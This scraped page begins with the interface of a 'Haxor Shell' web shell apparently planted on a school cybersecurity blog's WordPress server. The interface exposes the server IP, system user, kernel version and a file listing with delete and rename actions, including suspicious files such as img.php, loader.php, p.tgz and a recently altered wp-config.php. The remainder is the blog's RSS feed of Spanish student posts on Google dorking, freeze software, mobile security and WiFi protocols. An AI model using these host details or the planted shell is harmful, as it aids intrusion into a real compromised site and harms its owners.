217.18.163.144 - Linux - whoami(ciudadjardin.org_ftvyicrnorl) - [uid(10001) gid(1003)] - [PostgreSql]
Haxor Shell (mi77ihaxor@gmail.com)

Path

Renamed to
Parent directoryPermCreation timeLast ChangedSizeAction
wp-admin07552024-01-10 04:40:362024-01-10 04:40:36-Del | Ren
wp-content07552026-09-20 17:31:482026-09-20 17:31:48-Del | Ren
wp-includes07552025-12-03 04:40:362025-12-03 04:40:36-Del | Ren
.htaccess06442022-11-02 08:43:392022-10-28 09:50:131.20 KView | Ren
.htaccess.bak06442022-11-02 08:43:372021-11-08 11:39:260 BView | Ren
google277e0b8be06fe533.html06442026-09-19 10:03:362026-09-19 10:03:3653 BView | Ren
img.php06662026-08-30 20:58:112026-08-30 20:58:1148 BView | Ren
index.php06442022-11-02 08:43:392020-02-06 06:33:11405 BView | Ren
license.txt06442026-02-04 04:46:332026-02-04 04:46:3319.44 KView | Ren
loader.php06442026-09-19 03:19:252026-09-19 03:19:25111.32 KView | Ren
maintenance-preview.php06442024-04-24 11:06:232024-04-24 11:06:231.99 KView | Ren
p.tgz06442026-09-19 06:07:422026-09-19 06:07:42266.55 MView | Ren
readme.html06442026-09-17 20:48:452026-09-17 20:48:457.25 KView | Ren
wordfence-waf.php06442022-11-02 08:43:392021-10-27 11:08:19325 BView | Ren
wp-activate.php06442025-12-03 04:40:372025-12-03 04:40:377.18 KView | Ren
wp-blog-header.php06442022-11-02 08:43:372020-02-06 06:33:11351 BView | Ren
wp-comments-post.php06442024-01-10 04:40:322024-01-10 04:40:322.27 KView | Ren
wp-config-sample.php06442026-09-19 10:02:462026-09-19 10:02:467.06 KView | Ren
wp-config.php06442026-09-19 10:03:242026-09-19 10:03:243.70 KView | Ren
wp-cron.php06442024-11-13 04:40:452024-11-13 04:40:455.49 KView | Ren
wp-links-opml.php06442025-12-03 04:40:362025-12-03 04:40:362.43 KView | Ren
wp-load.php06442024-07-17 03:40:452024-07-17 03:40:453.84 KView | Ren
wp-login.php06442026-08-06 19:50:572026-08-06 19:50:5750.25 KView | Ren
wp-mail.php06442025-12-03 04:40:362025-12-03 04:40:368.52 KView | Ren
wp-settings.php06442025-12-03 04:40:372025-12-03 04:40:3730.33 KView | Ren
wp-signup.php06442026-08-06 19:50:572026-08-06 19:50:5733.84 KView | Ren
wp-trackback.php06442025-12-03 04:40:362025-12-03 04:40:365.09 KView | Ren
wp_config_bak.php06442024-01-23 11:50:532024-01-23 11:50:533.42 KView | Ren
xmlrpc.php06442025-04-16 03:40:542025-04-16 03:40:543.13 KView | Ren
Total dir[3] - Total file[26] - Permission[0755]
Linux plesk144.red163.trevenque.es 4.18.0-372.9.1.el8.x86_64 #1 SMP Tue May 10 08:57:35 EDT 2022 x86_64
Apache
ciberseguridad – Ciberseguridad – IES Ciudad Jardín https://ciberseguridad.ciudadjardin.org Just another Premium Elementor Kit Templates site Wed, 12 Jan 2022 11:42:45 +0000 es hourly 1 https://wordpress.org/?v=6.9.8 Google Hacking https://ciberseguridad.ciudadjardin.org/2022/01/12/317/ https://ciberseguridad.ciudadjardin.org/2022/01/12/317/#respond Wed, 12 Jan 2022 11:38:55 +0000 https://ciberseguridad.ciudadjardin.org/?p=317 Definición:

También conocido como Google Dorking, es una técnica de “hacking” a veces solo referida como dork, que utiliza la búsqueda avanzada de Google para encontrar agujeros de seguridad en la configuración y el código de un sitio web.

Se pueden utilizar algunas de estas técnicas para filtrar la información y obtener mejores resultados de búsqueda, pero, en este caso, se centra en la información normalmente no accesible, como mostrar las imágenes de las cámaras de seguridad o ciertos documentos.

Comandos para filtrar las búsquedas en Google:

A la hora de realizar una búsqueda en Google, hay ciertas palabras clave y operadores que funcionan como un lenguaje de consulta estructurado y tienen un significado especial para este motor de búsqueda. Los mismos se utilizan para filtrar los resultados.

Es decir que pueden apoyarse en estos operadores para buscar resultados relevantes para sus búsquedas mas rápidas y precisas.

Lista de algunos comandos:

OperadorEjemplo de búsqueda en GooglePropósito¿Se puede combinar con otros?
sitesite:wikipedia.orgBuscar resultados dentro de un sitio específicosi
relatedrelated:wikipedia.orgBuscar sitios relacionadossi
cachecache:wikipedia.orgBuscar la versión del sitio en cachési
intitleintitle:wikipediaBuscar en el título de la páginasi
]]>
https://ciberseguridad.ciudadjardin.org/2022/01/12/317/feed/ 0
Software de congelación https://ciberseguridad.ciudadjardin.org/2021/12/20/software-de-congelacion/ https://ciberseguridad.ciudadjardin.org/2021/12/20/software-de-congelacion/#respond Mon, 20 Dec 2021 08:41:56 +0000 https://ciberseguridad.ciudadjardin.org/?p=280

¿Qué son los software de congelación?

Son programas que congelan los datos de una unidad de almacenamiento o de todo el sistema, es decir, redirige la información que iba a ser escrita en estos y en el próximo reinicio los datos protegidos por el software se mantendrían intactos y los que fueron redirigidos desaparecerán.

Esto es muy usado cuando queremos probar cambios potencialmente inestables o malignos, sabiendo que al reiniciar el sistema desaparecerán y volviendo a su estado original.

Ventajas e inconvenientes

  • Ventajas: Puede restaurar ciertos daños provocados por malware o virus ya que tras el reinicio cualquier cambio hecho por el software malicioso debería quedar eliminado del sistema al ser revertido al estado original
  • Inconvenientes: No impide que un virus o malware se desarrolle mientras que no se reinicie el sistema, o que el virus afecte a una partición que no esté protegida, o que se coloque en el registro del Deep Freeze (Ej. de software de congelación) como archivo que estaba previamente en el sistema.

Ejemplos prácticos de los software de congelación

  • En un ordenador casero, que suele usarse por parte de varios usuarios o en un ordenador de uso laboral dentro de una organización que suele usarse por un trabajador único, o un ordenador de uso laboral del tipo donde suele ser usado por muchas personas distintas para diversas tareas, tales como bibliotecas, ciber-café, hoteles o salas de trabajo común, o un simple ordenador con un simple usuario o más, una vez usado, nunca suele quedar en el estado inicial de uso o inmediatamente anterior.
  • Desde la más sencilla investigación o redacción de algún documento usando internet hasta la más completa jornada de uso personal o de trabajo, suele provocar la descarga de infinidad de archivos, que ocupan espacio, y que pueden generar o no, cambios dentro de aplicaciones o el mismísimo SO. Y eso sin contar que cada distinto usuario puede manualmente instalar o configurar distintas aplicaciones o parámetros del SO que provoquen sutiles cambios acumulativos o importantes cambios notables en el funcionamiento del mismo.

Software de congelación para dispositivos móviles

En nuestros dispositivos móviles no contamos con software de congelación como el que hemos conocido anteriormente, este viene integrado en nuestros dispositivos Android y la función que realiza es la de deshabilitar aplicaciones y cualquier consumo mientras nuestro dispositivo este «congelado».

]]>
https://ciberseguridad.ciudadjardin.org/2021/12/20/software-de-congelacion/feed/ 0
Seguridad en dispositivos móviles https://ciberseguridad.ciudadjardin.org/2021/12/20/seguridad-en-dispositivos-moviles/ https://ciberseguridad.ciudadjardin.org/2021/12/20/seguridad-en-dispositivos-moviles/#respond Mon, 20 Dec 2021 08:40:20 +0000 https://ciberseguridad.ciudadjardin.org/?p=278 En la actualidad, la seguridad informática es un factor a tener en cuenta, pero ¿cómo funciona la seguridad en los dispositivos móviles?

Seguridad del SO

La primera defensa contra ataques e infecciones la lleva a cabo el propio Sistema Operativo del teléfono.

Android

El sistema operativo más usado en móviles tiene unos sistemas de seguridad que vamos a ir enumerando, todo como se indica en su página.

  1. Detecta actividad peligrosa, como aplicaciones o enlaces dañinos, y te avisa con elección.
  2. Incluye Google Play Protect para mayor defensa y precaución.
  3. Transcribe las llamadas y detecta llamadas sospechosas de spam.
  4. También te protege cuando navegas, evitando malas prácticas.
  5. Protege tu privacidad de robos.
  6. Te permite elegir qué permisos dar a una aplicación, y te protege de aplicaciones olvidadas.
  7. Mientras está apagado los datos están cifrados.

Como podemos apreciar Android también se preocupa de sus clientes.

Pero no es el único, cada Sistema Operativo tiene sus propios métodos de protegernos, te animo a descubrir cómo Apple protege sus dispositivos.

Seguridad del consumidor

No debemos dejar toda la seguridad a manos del SO.

Como consumidores y dueños de nuestros dispositivos también debemos velar por la seguridad tanto del móvil como de nuestros datos.

Mantener nuestro móvil a salvo es posible de diferentes formas:

  • Navegar con precaución, usar modo incógnito, controlar las cookies y no aportar nuestros datos a cualquier página.
  • No descargar archivos que puedan resultar dañinos, para esto Android nos ayuda detectando y dándonos la opción de denegar permisos.
  • Usar un antivirus y escanear el dispositivo a menudo, algunos móviles poseen el propio.
  • No entregues tu móvil a tus compañeros ni muestres tus claves.
  • Protege tu móvil en caso de robo, tener un localizador, evitar recordadores de contraseñas, etc…
]]>
https://ciberseguridad.ciudadjardin.org/2021/12/20/seguridad-en-dispositivos-moviles/feed/ 0
Algoritmos de seguridad WIFI https://ciberseguridad.ciudadjardin.org/2021/12/20/algoritmos-de-seguridad-wifi/ https://ciberseguridad.ciudadjardin.org/2021/12/20/algoritmos-de-seguridad-wifi/#respond Mon, 20 Dec 2021 08:38:01 +0000 https://ciberseguridad.ciudadjardin.org/?p=276 Los algoritmos de seguridad WiFi han pasado por muchos cambios y mejoras desde los 90. Se desarrollaron diferentes tipos de protocolos de seguridad inalámbricos para la protección de redes inalámbricas domésticas.

A continuación veremos los protocolos de seguridad WEP, WPA y WPA2.

  • WEP: Fue desarrollado para redes inalámbricas y aprobado como estándar de seguridad WiFi en septiembre de 1999. WEP debía ofrecer el mismo nivel de seguridad que las redes cableadas, sin embargo hay un montón de problemas de seguridad conocidos en WEP, que también es fácil de romper y difícil de configurar. A pesar de todo el trabajo que se ha hecho para mejorar el sistema, WEP sigue siendo una solución altamente vulnerable. Los sistemas que dependen de este protocolo deben ser actualizados o reemplazados en caso de que la actualización de seguridad no sea posible. WEP fue oficialmente abandonada por la Alianza WiFi en 2004.
  • WPA: Durante el tiempo en que estaba desarrollando el estándar de seguridad inalámbrica 802.11i, se utilizó WPA como mejora temporal de la seguridad de WEP. Un año antes de que WEP fuera oficialmente abandonada, WPA fue formalmente adoptada. La mayoría de las aplicaciones WPA modernas utilizan una clave precompartida (PSK), denominada con mayor frecuencia WPA Personal, y el Protocolo de integridad de clave temporal o TKIP (/ti: kip/) para el cifrado. WPA , al igual que WEP, después de haber sido sometida a pruebas de concepto y a demostraciones públicas aplicadas, resultó ser bastante vulnerable a la intrusión.
  • WPA2: El protocolo basado en el estándar de seguridad inalámbrica 802.11i se introdujo en 2004. La mejora más importante de WPA2 sobre WPA fue el uso del Advanced Encryption Standard (AES). AES está aprobado por el gobierno de los Estados Unidos para encriptar la información clasificada como de alto secreto, por lo que debe ser lo suficientemente bueno como para proteger las redes domésticas. La principal vulnerabilidad de WPA2 es cuando el atacante ya tiene acceso a una red WiFi segura y puede acceder a ciertas teclas para realizar un ataque a otros dispositivos de la red. El foco de ataque principal en redes con WPA2 es relacionado a niveles de empresa y no a pequeñas redes domésticas.

Información extraída de NetSpot.

]]>
https://ciberseguridad.ciudadjardin.org/2021/12/20/algoritmos-de-seguridad-wifi/feed/ 0